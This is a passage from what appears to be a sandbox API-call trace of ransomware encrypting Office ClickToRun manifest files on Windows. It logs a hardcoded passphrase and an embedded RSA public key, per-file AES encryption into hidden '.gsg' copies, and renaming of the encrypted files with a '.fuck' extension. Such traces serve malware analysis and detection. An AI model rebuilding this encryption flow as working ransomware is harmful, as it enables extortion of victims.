lpBuffer=0x27ff320, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.246] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2808878, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2808878, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.246] CryptEncrypt (in: hKey=0x27eb8a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2808878*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2808878*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.246] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2808878, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.246] CloseHandle (hObject=0xffffffff) returned 1 [0236.246] CloseHandle (hObject=0xffffffff) returned 1 [0236.246] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0236.247] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0236.247] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml.gsg")) returned 0 [0236.247] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml.fuck")) returned 0 [0236.248] CryptDestroyHash (hHash=0x27ebce0) returned 1 [0236.248] CryptDestroyKey (hKey=0x27eb8a0) returned 1 [0236.248] CryptReleaseContext (hProv=0x27feb28, dwFlags=0x0) returned 1 [0236.248] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.248] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.248] GetLastError () returned 0x5 [0236.248] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml")) returned 0x20 [0236.248] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0236.248] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.249] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.249] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.249] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2800750) returned 1 [0236.254] CryptCreateHash (in: hProv=0x2800750, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.255] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.255] CryptHashData (hHash=0x27eb8a0, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.255] CryptDeriveKey (in: hProv=0x2800750, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0236.255] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.255] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.255] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2800420) returned 1 [0236.256] CryptImportPublicKeyInfo (in: hCryptProv=0x2800420, dwCertEncodingType=0x1, pInfo=0x27f66d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f6708*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f6710*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb320) returned 1 [0236.256] CryptEncrypt (in: hKey=0x27eb320, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.256] CryptEncrypt (in: hKey=0x27eb320, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2800200*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2800200*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.257] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2800200, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.257] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2808878, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2808878, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.257] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2808878*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2808878*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.257] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2808878, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.257] CloseHandle (hObject=0xffffffff) returned 1 [0236.257] CloseHandle (hObject=0xffffffff) returned 1 [0236.257] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0236.257] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0236.258] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml.gsg")) returned 0 [0236.258] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml.fuck")) returned 0 [0236.258] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0236.258] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0236.258] CryptReleaseContext (hProv=0x2800750, dwFlags=0x0) returned 1 [0236.258] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.258] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.259] GetLastError () returned 0x5 [0236.259] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml")) returned 0x20 [0236.259] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0236.259] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.259] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.260] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.260] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27fef68) returned 1 [0236.265] CryptCreateHash (in: hProv=0x27fef68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.265] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.265] CryptHashData (hHash=0x27ebc60, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.265] CryptDeriveKey (in: hProv=0x27fef68, Algid=0x6610, hBaseData=0x27ebc60, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0236.266] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.266] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.266] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27feb28) returned 1 [0236.267] CryptImportPublicKeyInfo (in: hCryptProv=0x27feb28, dwCertEncodingType=0x1, pInfo=0x27f6ae8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f6b18*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f6b20*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb120) returned 1 [0236.267] CryptEncrypt (in: hKey=0x27eb120, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.267] CryptEncrypt (in: hKey=0x27eb120, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ff870*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27ff870*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.267] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27ff870, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.267] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2808878, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2808878, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.267] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2808878*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2808878*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.268] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2808878, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.268] CloseHandle (hObject=0xffffffff) returned 1 [0236.268] CloseHandle (hObject=0xffffffff) returned 1 [0236.268] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0236.268] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0236.268] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml.gsg")) returned 0 [0236.269] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml.fuck")) returned 0 [0236.269] CryptDestroyHash (hHash=0x27ebc60) returned 1 [0236.269] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0236.269] CryptReleaseContext (hProv=0x27fef68, dwFlags=0x0) returned 1 [0236.269] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.269] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.269] GetLastError () returned 0x5 [0236.270] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml")) returned 0x20 [0236.270] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0236.270] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.270] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.270] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.271] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2800640) returned 1 [0236.277] CryptCreateHash (in: hProv=0x2800640, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.277] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.277] CryptHashData (hHash=0x27eb8a0, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.277] CryptDeriveKey (in: hProv=0x2800640, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0236.278] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.278] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.278] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2800310) returned 1 [0236.279] CryptImportPublicKeyInfo (in: hCryptProv=0x2800310, dwCertEncodingType=0x1, pInfo=0x27f7e68*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f7e98*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f7ea0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb160) returned 1 [0236.279] CryptEncrypt (in: hKey=0x27eb160, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.279] CryptEncrypt (in: hKey=0x27eb160, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2800530*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2800530*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.279] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2800530, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.279] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2808878, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2808878, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.279] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2808878*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2808878*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.279] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2808878, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.280] CloseHandle (hObject=0xffffffff) returned 1 [0236.280] CloseHandle (hObject=0xffffffff) returned 1 [0236.280] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0236.280] SetFileAttributesA 